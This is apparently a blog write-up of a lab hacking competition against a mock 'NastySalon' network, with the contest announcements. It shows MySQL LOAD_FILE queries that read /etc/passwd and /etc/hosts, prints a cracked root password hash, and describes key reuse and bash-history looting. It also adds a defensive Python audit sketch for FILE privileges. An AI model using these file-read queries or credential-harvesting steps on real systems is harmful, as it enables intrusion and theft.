So phpMyAdmin points to a DB on .195.

SSH keypair to login to the server

Database Credentials



Successful Login

In here we found the passwords to both emails in the emails database, but we were still checking things out before just using our keypair. So we created a database, 0wnErz:
We made a table redteam with 2 columns, id and data. We filled them with dummy data, then pulled files in with updates.
UPDATE redteam SET Data=LOAD_FILE('/etc/hosts')
WHERE id=3;
UPDATE redteam SET Data=LOAD_FILE('/etc/passwd')
WHERE id=4;
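The `LOAD_FILE` reads above only work because the account behind phpMyAdmin held the global FILE privilege and the server did not confine file access with `secure_file_priv`. The audit sketch below is an added example, not part of the original walkthrough. It takes `SHOW GRANTS` output and the `secure_file_priv` value and reports whether such a read would pass MySQL's own checks; the account names and grant lines are constructed.

```python
import posixpath
import re

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<acct>\S+)", re.I)


def has_global_file_priv(grant_lines):
    """True if any SHOW GRANTS line gives FILE (or ALL) at the *.* scope."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope").replace("`", "") != "*.*":
            continue  # FILE is a global privilege; db.* grants never carry it
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False


def load_file_allowed(grant_lines, secure_file_priv, path):
    """Decide whether LOAD_FILE(path) passes MySQL's own checks.

    secure_file_priv: None models NULL, "" models the empty value, anything
    else is an absolute directory. File-system permissions of the mysqld
    user are not modelled here.
    """
    if not has_global_file_priv(grant_lines):
        return False, "account lacks the global FILE privilege"
    if not posixpath.isabs(path):
        return False, "LOAD_FILE needs a full path"
    if secure_file_priv is None:
        return False, "secure_file_priv is NULL: file import/export disabled"
    if secure_file_priv == "":
        return True, "secure_file_priv is empty: no directory restriction"
    base = posixpath.normpath(secure_file_priv)
    target = posixpath.normpath(path)          # collapses ../ sequences
    if posixpath.commonpath([base, target]) == base:
        return True, "path is inside secure_file_priv"
    return False, "path is outside secure_file_priv"


# Constructed SHOW GRANTS output; account names are hypothetical.
ROOT_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]
APP_GRANTS = [
    "GRANT USAGE ON *.* TO 'webapp'@'%'",
    "GRANT ALL PRIVILEGES ON `emails`.* TO 'webapp'@'%'",
]

if __name__ == "__main__":
    for grants, sfp in [(ROOT_GRANTS, ""), (ROOT_GRANTS, None),
                        (ROOT_GRANTS, "/var/lib/mysql-files"), (APP_GRANTS, "")]:
        print(repr(sfp), load_file_allowed(grants, sfp, "/etc/passwd"))
```

An application account scoped to its own database, as in `APP_GRANTS`, cannot read server files even when `secure_file_priv` is left empty.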

For lulz, while at it, we cracked the MySQL root hash. Despite the firewall, this was a weak password policy on their end:

root@localhost:  7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())    r00t
The race to the finish line began here. This happened very fast.

So with the keypair we downloaded from the mail, we logged in to the DB server.

Then we became super user:

Then we read the history file and more secrets :
cat .bash_history

So there's another keypair, but for the .2 server, i.e. the webserver. Remember from phpinfo? SSH is on port 49800. On checking the files in the ubuntu home directory we found the key, and yes, it's just that to get into the webserver.

Again get Root

Well, we'd say we are done, but we needed to share our joy, so on to /var/www and, like any movie, give credits to the actors :D


We'd like to thank Gichuki Jonia (./chuks) for the challenge, we learnt a lot while doing it, and Azanuru for the infrastructure. They made all this possible.

Friday, March 14, 2014

HACKBATTLE2013 SECOND UPDATE

One group so far has found an application they can target by using two different types of Assessments.

Currently no group has been able to interact with NastyLab DB, or any form of Internal login, system or application level.

Several testers scanning their way to blacklist.

LEAK: types of Assessments to use

a) Covert Data Acquisition
Try to steal data from all directions of the infrastructure, use Threat Intelligence and manipulate the data gathered against the applications or systems.

b) Advanced Persistent Threat
Polymorphic and SSLed malware use is necessary in case you want to learn the internals of NastySalon laptops or workstations. Crafting a good methodology will help you add points in this battle.

c) Database Security Assessment

Breaking into the database, going through the information and manipulating the DB, may get you to the next stage of exploitation and access.

d) Web Application Assessment

Understanding the web and its internals is vital. Collecting as much info on the website will help you get a lead on other forms of Assessments above. Being in a position to find a publicly available CMS, will also get you more intel to gain access to NastyLab infrastructure

e) Social Engineering Assessment

Plan and execute a good social engineering attack that is believable in real world. Don't just ask for a password, that will be stupid, understand the infrastructure first and then execute.

Good luck to all teams,

Two weeks to go.

Monday, March 03, 2014

HACKBATTLE 2013

Welcome to #Hackbattle2013, we delayed this battle so that we can have it running after AfricaHackOn this year.

This is the layout, NASTY SALON version 2. It's a little diverse and tougher coz you will be dealing with a crazy crazy IDS and FW.

Anyway, let's see who goes up the hill.



Infrastructure courtesy of Azanuru, for more information check azanuru.com